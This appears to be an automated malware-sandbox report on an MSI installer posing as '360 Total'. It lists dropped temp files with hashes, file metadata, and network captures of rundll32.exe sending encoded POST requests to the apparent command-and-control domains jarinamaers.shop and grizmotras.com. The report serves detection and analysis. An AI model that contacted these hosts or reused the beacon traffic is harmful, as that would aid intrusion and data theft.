                                                                SHA-512:CF8FBB75B38ACA74698BFDBB32A0C79A2589B2ABC09388B9E9049D2C6B1B79FE2110E57C275DC352DD19E5ED99CA27A4E20F65A38F49CF0BD14381234ECA2FEB
                                                                Malicious:false
                                                                Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

                                                                C:\Windows\Temp\~DF119A6BD75A17A3D9.TMP

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):512
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3::
                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                Malicious:false
                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Windows\Temp\~DF1D9EB0A73126B59B.TMP

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):20480
                                                                Entropy (8bit):1.5808291684127274
                                                                Encrypted:false
                                                                SSDEEP:48:y8Ph4uRc06WXOGjT54b7SaVAErCycD27SGTR:dh41IjTub7JewCS3
                                                                MD5:52FED0FB187091045C487FB8DFD94B4E
                                                                SHA1:F31BA1FC0E04140F359F8F4521F61D2F14240D49
                                                                SHA-256:BAF14058494B03F9C94972B99A7C0E9FF375991BAFEF8C74B1847304278DEADD
                                                                SHA-512:AD6D42A2FD9049C2E5D96205A61B0F5BD7486074774A9123594842CB176406592B8F968FC4D789741C1BD18002E23BE8618285B1CE32E08D2C01786562A32B4B
                                                                Malicious:false
                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Windows\Temp\~DF20CDAD37B86C29CB.TMP

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):32768
                                                                Entropy (8bit):1.2660861253773124
                                                                Encrypted:false
                                                                SSDEEP:48:zXwudBJvcFXOhT5O2b7SaVAErCycD27SGTR:7w9sTk2b7JewCS3
                                                                MD5:6705E201416C56C156C28221AD7102EC
                                                                SHA1:73A0103E661BFEAA7B78DFC07C1D674AA47CAA28
                                                                SHA-256:3440CFC8AFF2C8F157152ABF87C4E4913A9243B4B32350790FBF06BBFC0D5AB6
                                                                SHA-512:A4A85B82A35A325260D7EEC2F00CD15A604054F46A3A7E35BFE0C8F362B374D9AB20F4F7EB25D3D35C7BA6598072E8438A762BC3A659645BF8389116C182CA54
                                                                Malicious:false
                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Windows\Temp\~DF2F18E242DA04CE3D.TMP

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):512
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3::
                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                Malicious:false
                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Windows\Temp\~DF53A2555FE1236737.TMP

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):73728
                                                                Entropy (8bit):0.1432228615371309
                                                                Encrypted:false
                                                                SSDEEP:24:vOUTx0EsipV0E+0EsipV0EgVAEV0yjCycVQwGqKO2TcT+:2UTGSrSaVAErCycD2TA
                                                                MD5:745F1BB958E3899442A36BEFDD0FB5DA
                                                                SHA1:A6A39411B3FE0ED0069D5B49BB87310C65876C62
                                                                SHA-256:631B21127B3419AB912BA3EBF654FB4973D009D9D430D56C65F739B8B9811C99
                                                                SHA-512:B0FF8AE595A462723297266335A86D15BEDAF3E6B2EA4CAA29074336674A1355D44928E2EA086937402D8E57D68351F42F031B81B11565643D6A31600AEDA72F
                                                                Malicious:false
                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Windows\Temp\~DF57522413105921DA.TMP

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):32768
                                                                Entropy (8bit):1.2660861253773124
                                                                Encrypted:false
                                                                SSDEEP:48:zXwudBJvcFXOhT5O2b7SaVAErCycD27SGTR:7w9sTk2b7JewCS3
                                                                MD5:6705E201416C56C156C28221AD7102EC
                                                                SHA1:73A0103E661BFEAA7B78DFC07C1D674AA47CAA28
                                                                SHA-256:3440CFC8AFF2C8F157152ABF87C4E4913A9243B4B32350790FBF06BBFC0D5AB6
                                                                SHA-512:A4A85B82A35A325260D7EEC2F00CD15A604054F46A3A7E35BFE0C8F362B374D9AB20F4F7EB25D3D35C7BA6598072E8438A762BC3A659645BF8389116C182CA54
                                                                Malicious:false
                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Windows\Temp\~DF5E2EF32C0856442C.TMP

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):512
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3::
                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                Malicious:false
                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Windows\Temp\~DF753A3FA17D45070A.TMP

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):32768
                                                                Entropy (8bit):0.06805445723953887
                                                                Encrypted:false
                                                                SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOXvZ1UKkwQa70HLIAVky6lO:2F0i8n0itFzDHFXIOQa70uO
                                                                MD5:DDFE8FC02F97ED0B140BF8FEE34DBC22
                                                                SHA1:23118003F91DD54D01E75F1F22FC417A1F518DB5
                                                                SHA-256:47EBE8FB2E1FF000C6FD50F4ED992F9704EBE2816154A8637FEE2F9FCF0A97AA
                                                                SHA-512:39D6EEB91688280E34E5DA258220236BEB2A87A7B2EC5FF349CCC42A554863F54CA9DF53C0459B688B8408EF7F13D4083AC520E6B541CD4A347B3185BE2AFBB6
                                                                Malicious:false
                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Windows\Temp\~DF7FB8AB6F2332123C.TMP

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):512
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3::
                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                Malicious:false
                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Windows\Temp\~DFE0DE59643A97ACA1.TMP

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):32768
                                                                Entropy (8bit):1.2660861253773124
                                                                Encrypted:false
                                                                SSDEEP:48:zXwudBJvcFXOhT5O2b7SaVAErCycD27SGTR:7w9sTk2b7JewCS3
                                                                MD5:6705E201416C56C156C28221AD7102EC
                                                                SHA1:73A0103E661BFEAA7B78DFC07C1D674AA47CAA28
                                                                SHA-256:3440CFC8AFF2C8F157152ABF87C4E4913A9243B4B32350790FBF06BBFC0D5AB6
                                                                SHA-512:A4A85B82A35A325260D7EEC2F00CD15A604054F46A3A7E35BFE0C8F362B374D9AB20F4F7EB25D3D35C7BA6598072E8438A762BC3A659645BF8389116C182CA54
                                                                Malicious:false
                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Windows\Temp\~DFE14153A1C06501E6.TMP

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):20480
                                                                Entropy (8bit):1.5808291684127274
                                                                Encrypted:false
                                                                SSDEEP:48:y8Ph4uRc06WXOGjT54b7SaVAErCycD27SGTR:dh41IjTub7JewCS3
                                                                MD5:52FED0FB187091045C487FB8DFD94B4E
                                                                SHA1:F31BA1FC0E04140F359F8F4521F61D2F14240D49
                                                                SHA-256:BAF14058494B03F9C94972B99A7C0E9FF375991BAFEF8C74B1847304278DEADD
                                                                SHA-512:AD6D42A2FD9049C2E5D96205A61B0F5BD7486074774A9123594842CB176406592B8F968FC4D789741C1BD18002E23BE8618285B1CE32E08D2C01786562A32B4B
                                                                Malicious:false
                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Windows\Temp\~DFEE481D50198BBEA6.TMP

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):512
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3::
                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                Malicious:false
                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                Static File Info

                                                                General

                                                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {805E70A6-23C0-4688-BBAF-6F995BB72730}, Number of Words: 10, Subject: 360 Total, Author: HuMaster LLC, Name of Creating Application: 360 Total, Template: ;1033, Comments: This installer database contains the logic and data required to install 360 Total., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                Entropy (8bit):7.152500797895932
                                                                TrID:
                                                                • Windows SDK Setup Transform Script (63028/2) 47.91%
                                                                • Microsoft Windows Installer (60509/1) 46.00%
                                                                • Generic OLE2 / Multistream Compound File (8008/1) 6.09%
                                                                File name:ad.msi
                                                                File size:1'619'456 bytes
                                                                MD5:666151c11b7899a0c764abe711d3f9b3
                                                                SHA1:35462114e096f4d307607d713136bfe38479870d
                                                                SHA256:8041a15e27c785f2adcce9e8c643f5cc619b52e50cd36ff043d13c4089ce1cad
                                                                SHA512:835fee905d540f1e3b4d32a0645041c9add6ea488675a8ca99dbe571cfaaef5781bed8c1277dd7942be7d672945d68a1016c2ab5cb645d539e07893d69672adc
                                                                SSDEEP:49152:QZH3YuW8zBQSc0ZnSKmZKumZr7A2BQTBG:+Y90Zn0K/A2OF
                                                                TLSH:CB75D0227386C537C96E01303A29D66B5579FDB74B3140CBA3C82D2E9EB45C16639FA3
                                                                File Content Preview:........................>.......................................................E.......a...............................(...)...*...+...,...-...........A...B...C...D...E...F..................................................................................

                                                                File Icon

                                                                Icon Hash:2d2e3797b32b2b99

                                                                Network Behavior

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Apr 26, 2024 02:48:16.643066883 CEST49714443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:16.643151045 CEST44349714104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:16.643471956 CEST49714443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:16.655702114 CEST49714443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:16.655742884 CEST44349714104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:16.919209957 CEST44349714104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:16.919351101 CEST49714443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:16.979701996 CEST49714443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:16.979738951 CEST44349714104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:16.979996920 CEST44349714104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:16.983747005 CEST49714443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:16.985203028 CEST49714443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:17.028152943 CEST44349714104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:22.859837055 CEST44349714104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:22.859922886 CEST49714443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:22.859966040 CEST44349714104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:22.859992981 CEST44349714104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:22.860158920 CEST49714443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:22.860296965 CEST49714443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:22.860327005 CEST44349714104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:23.915805101 CEST49715443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:23.915874958 CEST44349715104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:23.915951967 CEST49715443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:23.916218996 CEST49715443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:23.916254044 CEST44349715104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:24.173628092 CEST44349715104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:24.173687935 CEST49715443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:24.174294949 CEST49715443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:24.174309969 CEST44349715104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:24.176217079 CEST49715443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:24.176229000 CEST44349715104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:31.195980072 CEST44349715104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:31.196032047 CEST44349715104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:31.196217060 CEST49715443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:31.196810961 CEST49715443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:31.196830988 CEST44349715104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:31.325968981 CEST49716443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:31.326080084 CEST44349716104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:31.326260090 CEST49716443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:31.326539040 CEST49716443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:31.326553106 CEST44349716104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:31.587157011 CEST44349716104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:31.587430000 CEST49716443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:33.129801989 CEST49716443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:33.129825115 CEST44349716104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:33.132189035 CEST49716443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:33.132199049 CEST44349716104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:38.234056950 CEST44349716104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:38.234132051 CEST44349716104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:38.235032082 CEST49716443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:38.235220909 CEST49716443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:38.235243082 CEST44349716104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:38.325870991 CEST49717443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:38.325910091 CEST44349717104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:38.326781988 CEST49717443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:38.327100039 CEST49717443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:38.327114105 CEST44349717104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:38.587868929 CEST44349717104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:38.591837883 CEST49717443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:38.593571901 CEST49717443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:38.593571901 CEST49717443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:38.593585014 CEST44349717104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:38.593599081 CEST44349717104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:44.735337973 CEST44349717104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:44.735404015 CEST49717443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:44.735425949 CEST44349717104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:44.735434055 CEST44349717104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:44.735480070 CEST49717443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:44.735737085 CEST49717443192.168.2.5104.21.46.75
                                                                Apr 26, 2024 02:48:44.735754967 CEST44349717104.21.46.75192.168.2.5
                                                                Apr 26, 2024 02:48:45.091228962 CEST49718443192.168.2.5172.67.219.28
                                                                Apr 26, 2024 02:48:45.091264963 CEST44349718172.67.219.28192.168.2.5
                                                                Apr 26, 2024 02:48:45.091329098 CEST49718443192.168.2.5172.67.219.28
                                                                Apr 26, 2024 02:48:45.091772079 CEST49718443192.168.2.5172.67.219.28
                                                                Apr 26, 2024 02:48:45.091784954 CEST44349718172.67.219.28192.168.2.5
                                                                Apr 26, 2024 02:48:45.367361069 CEST44349718172.67.219.28192.168.2.5
                                                                Apr 26, 2024 02:48:45.367427111 CEST49718443192.168.2.5172.67.219.28
                                                                Apr 26, 2024 02:48:45.402038097 CEST49718443192.168.2.5172.67.219.28
                                                                Apr 26, 2024 02:48:45.402062893 CEST44349718172.67.219.28192.168.2.5
                                                                Apr 26, 2024 02:48:45.402436972 CEST44349718172.67.219.28192.168.2.5
                                                                Apr 26, 2024 02:48:45.402482986 CEST49718443192.168.2.5172.67.219.28
                                                                Apr 26, 2024 02:48:45.402915955 CEST49718443192.168.2.5172.67.219.28
                                                                Apr 26, 2024 02:48:45.448117971 CEST44349718172.67.219.28192.168.2.5
                                                                Apr 26, 2024 02:48:49.462635994 CEST44349718172.67.219.28192.168.2.5
                                                                Apr 26, 2024 02:48:49.462759972 CEST44349718172.67.219.28192.168.2.5
                                                                Apr 26, 2024 02:48:49.462867022 CEST49718443192.168.2.5172.67.219.28
                                                                Apr 26, 2024 02:48:50.923677921 CEST49718443192.168.2.5172.67.219.28
                                                                Apr 26, 2024 02:48:50.923712015 CEST44349718172.67.219.28192.168.2.5
                                                                Apr 26, 2024 02:48:51.189179897 CEST49719443192.168.2.5172.67.219.28
                                                                Apr 26, 2024 02:48:51.189289093 CEST44349719172.67.219.28192.168.2.5
                                                                Apr 26, 2024 02:48:51.189385891 CEST49719443192.168.2.5172.67.219.28
                                                                Apr 26, 2024 02:48:51.189682961 CEST49719443192.168.2.5172.67.219.28
                                                                Apr 26, 2024 02:48:51.189718962 CEST44349719172.67.219.28192.168.2.5
                                                                Apr 26, 2024 02:48:51.449820042 CEST44349719172.67.219.28192.168.2.5
                                                                Apr 26, 2024 02:48:51.449889898 CEST49719443192.168.2.5172.67.219.28
                                                                Apr 26, 2024 02:48:51.450421095 CEST49719443192.168.2.5172.67.219.28
                                                                Apr 26, 2024 02:48:51.450445890 CEST44349719172.67.219.28192.168.2.5
                                                                Apr 26, 2024 02:48:51.452012062 CEST49719443192.168.2.5172.67.219.28
                                                                Apr 26, 2024 02:48:51.452023029 CEST44349719172.67.219.28192.168.2.5
                                                                Apr 26, 2024 02:48:57.895072937 CEST44349719172.67.219.28192.168.2.5
                                                                Apr 26, 2024 02:48:57.895155907 CEST49719443192.168.2.5172.67.219.28
                                                                Apr 26, 2024 02:48:57.895175934 CEST44349719172.67.219.28192.168.2.5
                                                                Apr 26, 2024 02:48:57.895319939 CEST49719443192.168.2.5172.67.219.28

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Apr 26, 2024 02:48:16.503490925 CEST6388853192.168.2.51.1.1.1
                                                                Apr 26, 2024 02:48:16.638087034 CEST53638881.1.1.1192.168.2.5
                                                                Apr 26, 2024 02:48:44.927417040 CEST5016253192.168.2.51.1.1.1
                                                                Apr 26, 2024 02:48:45.090195894 CEST53501621.1.1.1192.168.2.5

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Apr 26, 2024 02:48:16.503490925 CEST192.168.2.51.1.1.10xa1cdStandard query (0)jarinamaers.shopA (IP address)IN (0x0001)false
                                                                Apr 26, 2024 02:48:44.927417040 CEST192.168.2.51.1.1.10xf7fStandard query (0)grizmotras.comA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Apr 26, 2024 02:48:16.638087034 CEST1.1.1.1192.168.2.50xa1cdNo error (0)jarinamaers.shop104.21.46.75A (IP address)IN (0x0001)false
                                                                Apr 26, 2024 02:48:16.638087034 CEST1.1.1.1192.168.2.50xa1cdNo error (0)jarinamaers.shop172.67.136.103A (IP address)IN (0x0001)false
                                                                Apr 26, 2024 02:48:45.090195894 CEST1.1.1.1192.168.2.50xf7fNo error (0)grizmotras.com172.67.219.28A (IP address)IN (0x0001)false
                                                                Apr 26, 2024 02:48:45.090195894 CEST1.1.1.1192.168.2.50xf7fNo error (0)grizmotras.com104.21.59.82A (IP address)IN (0x0001)false

                                                                HTTP Request Dependency Graph

                                                                • jarinamaers.shop
                                                                • grizmotras.com

                                                                HTTPS Proxied Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.549714104.21.46.754432624C:\Windows\System32\rundll32.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-04-26 00:48:16 UTC229OUTPOST /live/ HTTP/1.1
                                                                Accept: */*
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                Host: jarinamaers.shop
                                                                Content-Length: 252
                                                                Cache-Control: no-cache
                                                                2024-04-26 00:48:16 UTC252OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 72 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 30 56 6b 6c 6d 79 37 39 64 54 54 4c 68 4f 50 56 38 33 30 37 43 56 58 78 71 61 42 6e 4c 41 48 36 41 50 53 63 65 4f 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 36 7a 46 72 48 6c 76 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 73 4c 61 57 31 48 32 47 79 34 6b 4a 34 39 66 61 72 37 4c 36 79 62 6c 6c 4a 32 69 59 39 6f 55 48 49 46 33 75 4c 44 34 34 36 7a 6b 6c 57 6a 51 57 64 6d 37 44 7a 2f 4a 6a 49 30 4c 59 50 48 4a 51 6c 77 35 62 79 6a 5a 4c 30 76 38 45 63 32 62 47 74 6a 38 65 4f 48 65 7a 6f 57 75 4a 34 54 74 48 48 4d 35 72 4a 53 42 39 44 57 51 3d 3d
                                                                Data Ascii: YjOeEyiMk3RrE5vcC/HWCbEd2NSiC0Vklmy79dTTLhOPV8307CVXxqaBnLAH6APSceOBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjsLaW1H2Gy4kJ49far7L6ybllJ2iY9oUHIF3uLD446zklWjQWdm7Dz/JjI0LYPHJQlw5byjZL0v8Ec2bGtj8eOHezoWuJ4TtHHM5rJSB9DWQ==
                                                                2024-04-26 00:48:22 UTC574INHTTP/1.1 200 OK
                                                                Date: Fri, 26 Apr 2024 00:48:22 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vrafeva9SPCjQCSc8ntk1E4nqUnSJ2vxX77vaRy3zYhuwEEhDm7RD6YNhAvvR7bfwRooAiIkMi59SD%2BUEObRzDd0S3aY%2FIpm93qSvnE9AOrB0gEy%2F%2Fm8ORb0ol68GtxHrgew"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 87a290fb29885c6f-MIA
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-04-26 00:48:22 UTC26INData Raw: 31 34 0d 0a 51 68 4f 6d 4d 42 32 6e 70 54 56 71 44 4a 4f 6f 63 51 3d 3d 0d 0a
                                                                Data Ascii: 14QhOmMB2npTVqDJOocQ==
                                                                2024-04-26 00:48:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.549715104.21.46.754432624C:\Windows\System32\rundll32.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-04-26 00:48:24 UTC229OUTPOST /live/ HTTP/1.1
                                                                Accept: */*
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                Host: jarinamaers.shop
                                                                Content-Length: 180
                                                                Cache-Control: no-cache
